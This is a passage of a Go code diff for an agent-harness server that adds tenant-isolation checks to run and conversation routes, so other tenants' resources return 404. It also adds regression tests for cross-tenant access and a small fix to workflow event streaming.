+		if s.blockCrossTenant(w, r, runID) {
 			return
 		}
 		s.handleRunSteer(w, r, runID)
@@ -225,6 +314,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsRead)
 			return
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleRunContext(w, r, runID)
 		return
 	}
@@ -233,6 +325,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 	if len(parts) == 2 && parts[1] == "compact" {
 		if !hasScope(r.Context(), store.ScopeRunsWrite) {
 			writeScopeError(w, store.ScopeRunsWrite)
+			return
+		}
+		if s.blockCrossTenant(w, r, runID) {
 			return
 		}
 		s.handleRunCompact(w, r, runID)
@@ -252,12 +347,18 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 				return
 			}
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleRunTodos(w, r, runID)
 		return
 	}
 	if len(parts) == 2 && parts[1] == "cancel" {
 		if !hasScope(r.Context(), store.ScopeRunsWrite) {
 			writeScopeError(w, store.ScopeRunsWrite)
+			return
+		}
+		if s.blockCrossTenant(w, r, runID) {
 			return
 		}
 		s.handleCancelRun(w, r, runID)
@@ -270,6 +371,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsWrite)
 			return
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleApproveRun(w, r, runID)
 		return
 	}
@@ -280,11 +384,92 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsWrite)
 			return
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleDenyRun(w, r, runID)
 		return
 	}
 
 	http.NotFound(w, r)
+}
+
+// blockCrossTenant enforces tenant ownership on per-run by-ID routes. It is
+// called AFTER the per-route scope check (so an under-scoped caller still sees
+// 403, not 404). When the run belongs to a different tenant it writes a 404
+// not_found response — matching the unknown-id contract so the existence of
+// another tenant's run is never revealed — and returns true to signal the
+// caller to stop. Returns false (no response written) when the request may
+// proceed. See runTenantMismatch for the ownership semantics.
+func (s *Server) blockCrossTenant(w http.ResponseWriter, r *http.Request, runID string) bool {
+	if s.runTenantMismatch(r, runID) {
+		writeError(w, http.StatusNotFound, "not_found", fmt.Sprintf("run %q not found", runID))
+		return true
+	}
+	return false
+}
+
+// conversationTenantMismatch reports whether a conversation sub-resource request
+// must be blocked because the conversation belongs to a tenant other than the
+// caller's.
+//
+// Resolution order (fail-closed when auth is enabled):
+//  1. Run store: list runs for the conversation; the run's TenantID is
+//     authoritative. Same-tenant → proceed. Cross-tenant → block.
+//  2. Conversation store: when no runs are found, fall back to the conversation
+//     store's own tenant_id column. This handles conversations that exist in the
+//     store but have no persisted run (e.g. conversations loaded from history
+//     before run persistence was enabled, or conversations stored directly).
+//     If the conversation record exists with a non-empty tenant that differs
+//     from the caller → block (fail-closed). If the conversation record has an
+//     empty tenant (legacy row without tenant stamp) → treat as same-tenant
+//     (preserve prior behavior for pre-tenant-stamp rows).
+//  3. Conversation not found in either source → let the downstream handler
+//     produce its own not-found response (return false, no gate).
+//
+// Auth disabled or no store → never gates (returns false).
+func (s *Server) conversationTenantMismatch(r *http.Request, conversationID string) bool {
+	if s.authDisabled || s.runStore == nil {
+		return false
+	}
+	caller := normalizeTenant(TenantIDFromContext(r.Context()))
+
+	// 1. Try the run store: list runs for this conversation without a tenant
+	// filter so we can read the stored owner unconditionally.
+	runs, err := s.runStore.ListRuns(r.Context(), store.RunFilter{ConversationID: conversationID})
+	if err == nil && len(runs) > 0 {
+		return normalizeTenant(runs[0].TenantID) != caller
+	}
+
+	// 2. No runs found (or store error). Fall back to the conversation store's
+	// own tenant_id column so a runless-but-stored conversation is not ungated.
+	if convStore := s.runner.GetConversationStore(); convStore != nil {
+		owner, err := convStore.GetConversationOwner(r.Context(), conversationID)
+		if err == nil && owner != nil {
+			// A row exists in the conversation store.
+			if owner.TenantID == "" {
+				// Legacy row with no tenant stamp: do not block (preserve prior behavior).
+				return false
+			}
+			return normalizeTenant(owner.TenantID) != caller
+		}
+	}
+
+	// 3. Conversation not found in any source: let the downstream handler
+	// produce its own not-found response.
+	return false
+}
+
+// blockConversationCrossTenant enforces tenant ownership on per-conversation
+// sub-resource routes (messages, export, compact, delete). It writes a 404
+// response and returns true when the conversation belongs to a different tenant.
+// Returns false (no response written) when the request may proceed.
+func (s *Server) blockConversationCrossTenant(w http.ResponseWriter, r *http.Request, convID string) bool {
+	if s.conversationTenantMismatch(r, convID) {
+		writeError(w, http.StatusNotFound, "not_found", fmt.Sprintf("conversation %q not found", convID))
+		return true
+	}
+	return false
 }
 
 // handleCancelRun handles POST /v1/runs/{id}/cancel.

--- a/internal/server/http_script_workflows.go
+++ b/internal/server/http_script_workflows.go
@@ -197,10 +197,13 @@ func (s *Server) handleScriptWorkflowRunByID(w http.ResponseWriter, r *http.Requ
 		w.Header().Set("Content-Type", "text/event-stream; charset=utf-8")
 		w.Header().Set("Cache-Control", "no-cache")
 
-		// Emit historical events
+		// Emit historical events; short-circuit if a terminal event is already in history.
 		for _, ev := range history {
 			fmt.Fprintf(w, "id: %d\nevent: %s\ndata: %s\n\n", ev.Seq, ev.Type, mustJSON(ev.Payload))
 			flusher.Flush()
+			if ev.Type == workflow.EventWorkflowCompleted || ev.Type == workflow.EventWorkflowFailed {
+				return
+			}
 		}
 		// Stream live events
 		for {

--- a/internal/server/http_script_workflows_test.go
+++ b/internal/server/http_script_workflows_test.go
@@ -24,11 +24,11 @@ import (
 // =============================================================================
 
 type mockScriptWorkflowMgr struct {
-	mu       sync.Mutex
-	runs     map[string]*workflow.Run
-	events   map[string][]workflow.Event
-	subs     map[string]map[chan workflow.Event]struct{}
-	seqs     map[string]int64
+	mu        sync.Mutex
+	runs      map[string]*workflow.Run
+	events    map[string][]workflow.Event
+	subs      map[string]map[chan workflow.Event]struct{}
+	seqs      map[string]int64
 	workflows []workflow.Meta
 }
 
@@ -433,7 +433,9 @@ func TestPOC6_EndToEndWorkflowLifecycle(t *testing.T) {
 	rec := httptest.NewRecorder()
 	mux.ServeHTTP(rec, req)
 	assert.Equal(t, http.StatusOK, rec.Code)
-	var listResp struct{ Workflows []workflow.Meta `json:"workflows"` }
+	var listResp struct {
+		Workflows []workflow.Meta `json:"workflows"`
+	}
 	json.Unmarshal(rec.Body.Bytes(), &listResp)
 	assert.Len(t, listResp.Workflows, 3)
 
@@ -443,7 +445,9 @@ func TestPOC6_EndToEndWorkflowLifecycle(t *testing.T) {
 	rec = httptest.NewRecorder()
 	mux.ServeHTTP(rec, req)
 	assert.Equal(t, http.StatusAccepted, rec.Code)
-	var startResp struct{ RunID string `json:"run_id"` }
+	var startResp struct {
+		RunID string `json:"run_id"`
+	}
 	json.Unmarshal(rec.Body.Bytes(), &startResp)
 
 	// Step 3: Start "deploy" workflow
@@ -451,11 +455,21 @@ func TestPOC6_EndToEndWorkflowLifecycle(t *testing.T) {
 	rec = httptest.NewRecorder()
 	mux.ServeHTTP(rec, req)
 	assert.Equal(t, http.StatusAccepted, rec.Code)
-	var deployResp struct{ RunID string `json:"run_id"` }
+	var deployResp struct {
+		RunID string `json:"run_id"`
+	}
 	json.Unmarshal(rec.Body.Bytes(), &deployResp)
 
-	// Step 4: Stream events for analyze
+	// Step 4: Stream events for analyze — blocks until workflow.completed received.
 	req = httptest.NewRequest(http.MethodGet, "/v1/script-workflow-runs/"+startResp.RunID+"/events", nil)
+	rec = httptest.NewRecorder()
+	mux.ServeHTTP(rec, req)
+	assert.Contains(t, rec.Body.String(), "event: workflow.completed")
+
+	// Step 4b: Stream events for deploy — ensures the deploy goroutine has finished
+	// before we poll its status in Step 5 (avoids a timing race where the 50 ms
+	// async completion goroutine has not yet marked the run "completed").
+	req = httptest.NewRequest(http.MethodGet, "/v1/script-workflow-runs/"+deployResp.RunID+"/events", nil)
 	rec = httptest.NewRecorder()
 	mux.ServeHTTP(rec, req)
 	assert.Contains(t, rec.Body.String(), "event: workflow.completed")
@@ -466,7 +480,9 @@ func TestPOC6_EndToEndWorkflowLifecycle(t *testing.T) {
 		rec = httptest.NewRecorder()
 		mux.ServeHTTP(rec, req)
 		assert.Equal(t, http.StatusOK, rec.Code)
-		var runResp struct{ Status string `json:"status"` }
+		var runResp struct {
+			Status string `json:"status"`
+		}
 		json.Unmarshal(rec.Body.Bytes(), &runResp)
 		assert.Equal(t, "completed", runResp.Status)
 	}
@@ -505,7 +521,9 @@ func TestPOC7_ConcurrentWorkflowRuns(t *testing.T) {
 			rec := httptest.NewRecorder()
 			mux.ServeHTTP(rec, req)
 			assert.Equal(t, http.StatusAccepted, rec.Code)
-			var resp struct{ RunID string `json:"run_id"` }
+			var resp struct {
+				RunID string `json:"run_id"`
+			}
 			json.Unmarshal(rec.Body.Bytes(), &resp)
 			mu.Lock()
 			runIDs[idx] = resp.RunID
@@ -587,7 +605,9 @@ func TestPOC9_SSEEventFormat(t *testing.T) {
 	req := httptest.NewRequest(http.MethodPost, "/v1/script-workflows/test-workflow/runs", nil)
 	rec := httptest.NewRecorder()
 	mux.ServeHTTP(rec, req)
-	var startResp struct{ RunID string `json:"run_id"` }
+	var startResp struct {
+		RunID string `json:"run_id"`
+	}
 	json.Unmarshal(rec.Body.Bytes(), &startResp)
 
 	// Stream events

--- a/internal/server/http_tenant_isolation_test.go
+++ b/internal/server/http_tenant_isolation_test.go
@@ -1,0 +1,543 @@
+package server_test
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+	"go-agent-harness/internal/server"
+	"go-agent-harness/internal/store"
+)
+
+// twoTenantFixture wires up a single server with auth enabled and two tenants,
+// each with a distinct API key carrying runs:read + runs:write. A run started
+// by tenant A must never be readable or controllable by tenant B.
+type twoTenantFixture struct {
+	ts        *httptest.Server
+	prov      *fakeprovider.Provider
+	tokenA    string
+	tenantA   string
+	tokenB    string
+	tenantB   string
+	runStore  store.Store
+	convStore *harness.SQLiteConversationStore
+}
+
+// newTwoTenantFixture builds the fixture. The provider hangs on its first turn
+// so any run stays active (and resident in the runner's in-memory map) until
+// explicitly released, which keeps cross-tenant by-ID assertions deterministic.
+// A SQLite ConversationStore is wired in so tests can seed conversation data and
+// verify messages-endpoint isolation with a real positive control.
+func newTwoTenantFixture(t *testing.T) *twoTenantFixture {
+	t.Helper()
+
+	ms := store.NewMemoryStore()
+
+	tenantA := "tenant-alpha"
+	tokenA, keyA := generateFastAPIKey(t, tenantA, "key A", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyA); err != nil {
+		t.Fatalf("CreateAPIKey A: %v", err)
+	}
+
+	tenantB := "tenant-bravo"
+	tokenB, keyB := generateFastAPIKey(t, tenantB, "key B", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyB); err != nil {
+		t.Fatalf("CreateAPIKey B: %v", err)
+	}
+
+	prov := fakeprovider.New([]fakeprovider.Turn{{Hang: true}})
+
+	// SQLite conversation store enables the messages-endpoint positive control:
+	// tests can seed a conversation after the run is in-flight so that tenant A
+	// gets 200 (proves the gate is real) rather than 404 (no messages yet).
+	cs, err := harness.NewSQLiteConversationStore(filepath.Join(t.TempDir(), "two-tenant-convs.db"))
+	if err != nil {
+		t.Fatalf("NewSQLiteConversationStore: %v", err)
+	}
+	if err := cs.Migrate(context.Background()); err != nil {
+		t.Fatalf("Migrate: %v", err)
+	}
+	t.Cleanup(func() { _ = cs.Close() })
+
+	runner := harness.NewRunner(prov, harness.NewRegistry(), harness.RunnerConfig{
+		DefaultModel:        "test-model",
+		DefaultSystemPrompt: "test",
+		MaxSteps:            2,
+		Store:               ms,
+		ConversationStore:   cs,
+	})
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Store:  ms,
+		Runner: runner,
+		// AuthDisabled NOT set -- auth is enabled.
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		prov.Release()
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	return &twoTenantFixture{
+		ts:        ts,
+		prov:      prov,
+		tokenA:    tokenA,
+		tenantA:   tenantA,
+		tokenB:    tokenB,
+		tenantB:   tenantB,
+		runStore:  ms,
+		convStore: cs,
+	}
+}
+
+// startRun POSTs /v1/runs as the given tenant token and returns the new run ID.
+func (f *twoTenantFixture) startRun(t *testing.T, token string) string {
+	t.Helper()
+	b, _ := json.Marshal(map[string]any{"prompt": "hello"})
+	req, _ := http.NewRequest(http.MethodPost, f.ts.URL+"/v1/runs", bytes.NewReader(b))
+	req.Header.Set("Authorization", "Bearer "+token)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("POST /v1/runs: %v", err)
+	}
+	defer resp.Body.Close()
+	if resp.StatusCode != http.StatusAccepted {
+		body, _ := io.ReadAll(resp.Body)
+		t.Fatalf("POST /v1/runs: status %d, body %s", resp.StatusCode, body)
+	}
+	var created struct {
+		RunID string `json:"run_id"`
+	}
+	if err := json.NewDecoder(resp.Body).Decode(&created); err != nil {
+		t.Fatalf("decode create response: %v", err)
+	}
+	if created.RunID == "" {
+		t.Fatal("expected non-empty run_id")
+	}
+	return created.RunID
+}
+
+// waitInFlight blocks until the hanging provider has been entered at least once,
+// proving the run is active and resident in memory.
+func (f *twoTenantFixture) waitInFlight(t *testing.T) {
+	t.Helper()
+	deadline := time.Now().Add(3 * time.Second)
+	for time.Now().Before(deadline) {
+		if f.prov.Calls() >= 1 {
+			return
+		}
+		time.Sleep(5 * time.Millisecond)
+	}
+	t.Fatal("provider never went in-flight")
+}
+
+// doByID issues an HTTP request to a by-ID route with the given token and
+// returns the status code and body. A short per-request timeout guards against
+// the events route's SSE stream blocking the read indefinitely (it streams a
+// 200 while the bug is present; it returns a 404 once the fix lands).
+func (f *twoTenantFixture) doByID(t *testing.T, method, token, path string) (int, string) {
+	t.Helper()
+	ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second)
+	defer cancel()
+	req, _ := http.NewRequestWithContext(ctx, method, f.ts.URL+path, nil)
+	if token != "" {
+		req.Header.Set("Authorization", "Bearer "+token)
+	}
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("%s %s: %v", method, path, err)
+	}
+	defer resp.Body.Close()
+	body, _ := io.ReadAll(resp.Body)
+	return resp.StatusCode, string(body)
+}
+
+// currentStatus reads the run's status as the owning tenant.
+func (f *twoTenantFixture) currentStatus(t *testing.T, runID string) string {
+	t.Helper()
+	code, body := f.doByID(t, http.MethodGet, f.tokenA, "/v1/runs/"+runID)
+	if code != http.StatusOK {
+		t.Fatalf("owner GET /v1/runs/%s: status %d, body %s", runID, code, body)
+	}
+	var st struct {
+		Status string `json:"status"`
+	}
+	if err := json.Unmarshal([]byte(body), &st); err != nil {
+		t.Fatalf("decode status: %v (%s)", err, body)
+	}
+	return st.Status
+}
+
+// TestTenantIsolation_ByID_CrossTenantDenied (T-PFIX-2): a run owned by tenant A
+// must be invisible and uncontrollable by tenant B over the by-ID routes.
+func TestTenantIsolation_ByID_CrossTenantDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newTwoTenantFixture(t)
+	runID := f.startRun(t, f.tokenA)
+	f.waitInFlight(t)
+
+	// Tenant B GET /v1/runs/{id} -> 404 (must not reveal existence).
+	if code, body := f.doByID(t, http.MethodGet, f.tokenB, "/v1/runs/"+runID); code != http.StatusNotFound {
+		t.Errorf("tenant B GET /v1/runs/%s: got %d, want 404; body %s", runID, code, body)
+	}
+
+	// Tenant B GET /v1/runs/{id}/events -> 404.
+	if code, _ := f.doByID(t, http.MethodGet, f.tokenB, "/v1/runs/"+runID+"/events"); code != http.StatusNotFound {
+		t.Errorf("tenant B GET events: got %d, want 404", code)
+	}
+
+	// Tenant B GET /v1/runs/{id}/summary -> 404.
+	if code, _ := f.doByID(t, http.MethodGet, f.tokenB, "/v1/runs/"+runID+"/summary"); code != http.StatusNotFound {
+		t.Errorf("tenant B GET summary: got %d, want 404", code)
+	}
+
+	// Tenant B POST /v1/runs/{id}/cancel -> 404 AND must NOT cancel the run.
+	if code, body := f.doByID(t, http.MethodPost, f.tokenB, "/v1/runs/"+runID+"/cancel"); code != http.StatusNotFound {
+		t.Errorf("tenant B POST cancel: got %d, want 404; body %s", code, body)
+	}
+
+	// The run must remain active: tenant B's cancel must NOT have taken effect.
+	if got := f.currentStatus(t, runID); got == "cancelled" || got == "cancelling" {
+		t.Errorf("cross-tenant cancel affected the run: status=%q", got)
+	}
+
+	// Owner (tenant A) still sees and controls the run.
+	if code, body := f.doByID(t, http.MethodGet, f.tokenA, "/v1/runs/"+runID); code != http.StatusOK {
+		t.Errorf("owner GET /v1/runs/%s: got %d, want 200; body %s", runID, code, body)
+	}
+	if code, body := f.doByID(t, http.MethodPost, f.tokenA, "/v1/runs/"+runID+"/cancel"); code != http.StatusOK {
+		t.Errorf("owner POST cancel: got %d, want 200; body %s", code, body)
+	}
+}
+
+// TestTenantIsolation_CreateListAuth (T-D-create-list-auth): locks in the
+// existing correct create/list tenant behavior under auth.
+func TestTenantIsolation_CreateListAuth(t *testing.T) {
+	t.Parallel()
+
+	f := newTwoTenantFixture(t)
+
+	post := func(token string, body map[string]any) (int, string) {
+		b, _ := json.Marshal(body)
+		req, _ := http.NewRequest(http.MethodPost, f.ts.URL+"/v1/runs", bytes.NewReader(b))
+		req.Header.Set("Authorization", "Bearer "+token)
+		req.Header.Set("Content-Type", "application/json")
+		resp, err := http.DefaultClient.Do(req)
+		if err != nil {
+			t.Fatalf("POST /v1/runs: %v", err)
+		}
+		defer resp.Body.Close()
+		rb, _ := io.ReadAll(resp.Body)
+		return resp.StatusCode, string(rb)
+	}
+
+	// Conflicting tenant_id -> 400 invalid_request.
+	if code, body := post(f.tokenA, map[string]any{"prompt": "x", "tenant_id": f.tenantB}); code != http.StatusBadRequest {
+		t.Errorf("conflicting tenant_id: got %d, want 400; body %s", code, body)
+	}
+
+	// Matching tenant_id -> 202.
+	if code, body := post(f.tokenA, map[string]any{"prompt": "x", "tenant_id": f.tenantA}); code != http.StatusAccepted {
+		t.Errorf("matching tenant_id: got %d, want 202; body %s", code, body)
+	}
+
+	// Empty tenant_id -> 202 (filled from auth).
+	if code, body := post(f.tokenA, map[string]any{"prompt": "x"}); code != http.StatusAccepted {
+		t.Errorf("empty tenant_id: got %d, want 202; body %s", code, body)
+	}
+
+	// Tenant B starts a run too.
+	if code, body := post(f.tokenB, map[string]any{"prompt": "y"}); code != http.StatusAccepted {
+		t.Errorf("tenant B create: got %d, want 202; body %s", code, body)
+	}
+
+	// GET /v1/runs as tenant A must list ONLY tenant A's runs.
+	listReq, _ := http.NewRequest(http.MethodGet, f.ts.URL+"/v1/runs", nil)
+	listReq.Header.Set("Authorization", "Bearer "+f.tokenA)
+	listResp, err := http.DefaultClient.Do(listReq)
+	if err != nil {
+		t.Fatalf("GET /v1/runs: %v", err)
+	}
+	defer listResp.Body.Close()
+	if listResp.StatusCode != http.StatusOK {
+		body, _ := io.ReadAll(listResp.Body)
+		t.Fatalf("GET /v1/runs: status %d, body %s", listResp.StatusCode, body)
+	}
+	var listed struct {
+		Runs []struct {
+			ID       string `json:"id"`
+			TenantID string `json:"tenant_id"`
+		} `json:"runs"`
+	}
+	if err := json.NewDecoder(listResp.Body).Decode(&listed); err != nil {
+		t.Fatalf("decode list: %v", err)
+	}
+	if len(listed.Runs) == 0 {
+		t.Fatal("expected tenant A to have at least one run listed")
+	}
+	for _, r := range listed.Runs {
+		if r.TenantID != f.tenantA {
+			t.Errorf("GET /v1/runs leaked a run for tenant %q (run %s); caller is %q", r.TenantID, r.ID, f.tenantA)
+		}
+	}
+}
+
+// convIDFromRun fetches GET /v1/runs/{id} as tenant A and extracts conversation_id.
+func (f *twoTenantFixture) convIDFromRun(t *testing.T, runID string) string {
+	t.Helper()
+	code, body := f.doByID(t, http.MethodGet, f.tokenA, "/v1/runs/"+runID)
+	if code != http.StatusOK {
+		t.Fatalf("GET /v1/runs/%s as owner: status %d, body %s", runID, code, body)
+	}
+	var out struct {
+		ConversationID string `json:"conversation_id"`
+	}
+	if err := json.Unmarshal([]byte(body), &out); err != nil {
+		t.Fatalf("decode run response: %v (%s)", err, body)
+	}
+	if out.ConversationID == "" {
+		t.Fatalf("run %s has empty conversation_id", runID)
+	}
+	return out.ConversationID
+}
+
+// TestTenantIsolation_ConversationRuns_CrossTenantDenied (T-PFIX-3):
+//   - GET /v1/conversations/{id}/runs built a RunFilter with no TenantID ->
+//     tenant B could enumerate runs belonging to tenant A's conversation.
+//   - The conversation sub-resource routes (messages, export) must also return
+//     404 when the conversation belongs to another tenant.
+func TestTenantIsolation_ConversationRuns_CrossTenantDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newTwoTenantFixture(t)
+	runID := f.startRun(t, f.tokenA)
+	f.waitInFlight(t)
+
+	// Get the conversation ID from the run (as tenant A, who owns it).
+	convID := f.convIDFromRun(t, runID)
+
+	// --- runs sub-resource ---
+	// Tenant A must see their own run in the conversation.
+	if code, body := f.doByID(t, http.MethodGet, f.tokenA, "/v1/conversations/"+convID+"/runs"); code != http.StatusOK {
+		t.Errorf("owner GET /v1/conversations/%s/runs: status %d, body %s", convID, code, body)
+	} else {
+		var resp struct {
+			Runs []struct {
+				ID       string `json:"id"`
+				TenantID string `json:"tenant_id"`
+			} `json:"runs"`
+		}
+		if err := json.Unmarshal([]byte(body), &resp); err != nil {
+			t.Fatalf("decode conversation runs response: %v (%s)", err, body)
+		}
+		if len(resp.Runs) == 0 {
+			t.Errorf("owner GET /v1/conversations/%s/runs: expected at least 1 run, got 0", convID)
+		}
+	}
+
+	// Tenant B must NOT see tenant A's runs in the conversation -- cross-tenant leak.
+	// Before fix: tenant B gets a 200 with A's run. After fix: 200 with empty list.
+	code, body := f.doByID(t, http.MethodGet, f.tokenB, "/v1/conversations/"+convID+"/runs")
+	if code != http.StatusOK {
+		t.Errorf("tenant B GET /v1/conversations/%s/runs: want 200 (empty), got %d; body %s", convID, code, body)
+	} else {
+		var resp struct {
+			Runs []struct {
+				ID       string `json:"id"`
+				TenantID string `json:"tenant_id"`
+			} `json:"runs"`
+		}
+		if err := json.Unmarshal([]byte(body), &resp); err != nil {
+			t.Fatalf("decode cross-tenant conversation runs response: %v (%s)", err, body)
+		}
+		if len(resp.Runs) != 0 {
+			t.Errorf("cross-tenant GET /v1/conversations/%s/runs leaked %d run(s) to tenant B; want 0",
+				convID, len(resp.Runs))
+		}
+	}
+
+	// --- messages sub-resource ---
+	// Seed the SQLite conversation store with a message owned by tenant A.
+	// This ensures the messages endpoint can return 200 for tenant A (positive
+	// control), so a blanket-404 implementation could not pass this test.
+	// The run record (persisted to runStore synchronously at StartRun) is
+	// authoritative for conversationTenantMismatch; the seeded conversation row
+	// additionally satisfies ConversationMessages' fallback path for in-flight runs.
+	ctx := context.Background()
+	if err := f.convStore.SaveConversation(ctx, convID, []harness.Message{
+		{Role: "user", Content: "tenant A probe message"},
+	}); err != nil {
+		t.Fatalf("seed SaveConversation: %v", err)
+	}
+	if err := f.convStore.UpdateConversationMeta(ctx, convID, "", f.tenantA); err != nil {
+		t.Fatalf("seed UpdateConversationMeta: %v", err)
+	}
+
+	// Positive control: tenant A must see their own conversation (200 + ≥1 message).
+	// If this is 404, the seeding or server wiring is broken — not a tenant-gate issue.
+	if code, body := f.doByID(t, http.MethodGet, f.tokenA, "/v1/conversations/"+convID+"/messages"); code != http.StatusOK {
+		t.Errorf("owner GET /v1/conversations/%s/messages: want 200, got %d; body %s", convID, code, body)
+	}
+
+	// Negative control: tenant B must NOT see tenant A's conversation.
+	// Because tenant A DID get 200 above, a 404 here can only mean the gate fired,
+	// not that the conversation simply had no messages.
+	if code, _ := f.doByID(t, http.MethodGet, f.tokenB, "/v1/conversations/"+convID+"/messages"); code != http.StatusNotFound {
+		t.Errorf("tenant B GET /v1/conversations/%s/messages: want 404, got %d", convID, code)
+	}
+
+	// --- export sub-resource ---
+	// Positive control: tenant A can export their own conversation.
+	if code, body := f.doByID(t, http.MethodGet, f.tokenA, "/v1/conversations/"+convID+"/export"); code != http.StatusOK {
+		t.Errorf("owner GET /v1/conversations/%s/export: want 200, got %d; body %s", convID, code, body)
+	}
+	// Negative control: tenant B must NOT export tenant A's conversation.
+	if code, _ := f.doByID(t, http.MethodGet, f.tokenB, "/v1/conversations/"+convID+"/export"); code != http.StatusNotFound {
+		t.Errorf("tenant B GET /v1/conversations/%s/export: want 404, got %d", convID, code)
+	}
+}
+
+// runlessConversationFixture sets up a server with auth + a SQLite conversation
+// store containing a conversation owned by tenant A that has messages but NO
+// persisted run in the run store. This is the GAP-1 scenario: conversationTenantMismatch
+// resolves ownership via runStore.ListRuns, which returns empty → no gate → cross-tenant
+// access to a runless conversation's messages is allowed (the bug).
+type runlessConversationFixture struct {
+	ts     *httptest.Server
+	tokenA string
+	tokenB string
+	convID string
+}
+
+func newRunlessConversationFixture(t *testing.T) *runlessConversationFixture {
+	t.Helper()
+
+	ms := store.NewMemoryStore()
+
+	tenantA := "tenant-alpha"
+	tokenA, keyA := generateFastAPIKey(t, tenantA, "key A", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyA); err != nil {
+		t.Fatalf("CreateAPIKey A: %v", err)
+	}
+
+	tenantB := "tenant-bravo"
+	tokenB, keyB := generateFastAPIKey(t, tenantB, "key B", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyB); err != nil {
+		t.Fatalf("CreateAPIKey B: %v", err)
+	}
+
+	// SQLite conversation store with tenant A's conversation — no run record anywhere.
+	path := filepath.Join(t.TempDir(), "runless-conv.db")
+	cs, err := harness.NewSQLiteConversationStore(path)
+	if err != nil {
+		t.Fatalf("NewSQLiteConversationStore: %v", err)
+	}
+	if err := cs.Migrate(context.Background()); err != nil {
+		t.Fatalf("Migrate: %v", err)
+	}
+	t.Cleanup(func() { _ = cs.Close() })
+
+	convID := "conv-no-run-tenant-alpha"
+	ctx := context.Background()
+	if err := cs.SaveConversation(ctx, convID, []harness.Message{
+		{Role: "user", Content: "tenant A secret: alpha-top-secret-42"},
+		{Role: "assistant", Content: "understood, alpha-top-secret-42"},
+	}); err != nil {
+		t.Fatalf("SaveConversation: %v", err)
+	}
+	// stamp the conversation with tenant A's tenant_id (no run created anywhere).
+	if err := cs.UpdateConversationMeta(ctx, convID, "", tenantA); err != nil {
+		t.Fatalf("UpdateConversationMeta: %v", err)
+	}
+
+	runner := harness.NewRunner(
+		fakeprovider.New(nil),
+		harness.NewRegistry(),
+		harness.RunnerConfig{
+			DefaultModel:      "test-model",
+			Store:             ms,
+			ConversationStore: cs,
+		},
+	)
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Store:  ms,
+		Runner: runner,
+		// AuthDisabled NOT set — auth is enabled.
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	return &runlessConversationFixture{
+		ts:     ts,
+		tokenA: tokenA,
+		tokenB: tokenB,
+		convID: convID,
+	}
+}
+
+func (f *runlessConversationFixture) get(t *testing.T, token, path string) (int, string) {
+	t.Helper()
+	req, _ := http.NewRequest(http.MethodGet, f.ts.URL+path, nil)
+	req.Header.Set("Authorization", "Bearer "+token)
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("GET %s: %v", path, err)
+	}
+	defer resp.Body.Close()
+	body, _ := io.ReadAll(resp.Body)
+	return resp.StatusCode, string(body)
+}
+
+// TestTenantIsolation_RunlessConversation_CrossTenantDenied (GAP-1):
+// A conversation that exists in the conversation store (with messages and a
+// tenant_id) but has NO persisted run must still be gated. Before the fix,
+// conversationTenantMismatch falls back to runStore.ListRuns (returns empty) →
+// no gate → tenant B reads tenant A's messages. After the fix it must return 404.
+func TestTenantIsolation_RunlessConversation_CrossTenantDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newRunlessConversationFixture(t)
+
+	// Sanity: tenant A can access their own conversation's messages.
+	if code, body := f.get(t, f.tokenA, "/v1/conversations/"+f.convID+"/messages"); code != http.StatusOK {
+		t.Errorf("tenant A GET messages: got %d, want 200; body %s", code, body)
+	}
+
+	// GAP-1 regression: tenant B must NOT be able to access tenant A's runless
+	// conversation messages. Currently returns 200 (BUG — no gate when 0 runs).
+	if code, body := f.get(t, f.tokenB, "/v1/conversations/"+f.convID+"/messages"); code != http.StatusNotFound {
+		t.Errorf("tenant B GET messages: got %d (body: %s), want 404 — cross-tenant runless conversation is ungated", code, body)
+	}
+
+	// Same for the export endpoint.
+	if code, body := f.get(t, f.tokenB, "/v1/conversations/"+f.convID+"/export"); code != http.StatusNotFound {
+		t.Errorf("tenant B GET export: got %d (body: %s), want 404 — cross-tenant runless conversation is ungated", code, body)
+	}
+}

--- a/internal/server/http_test.go
+++ b/internal/server/http_test.go
@@ -517,9 +517,9 @@ func TestRunSummaryEndpoint(t *testing.T) {
 	cached := 10
 	provider := &scriptedProvider{turns: []harness.CompletionResult{
 		{
-			ToolCalls: []harness.ToolCall{{ID: "c1", Name: "bash", Arguments: `{"command":"echo hi"}`}},
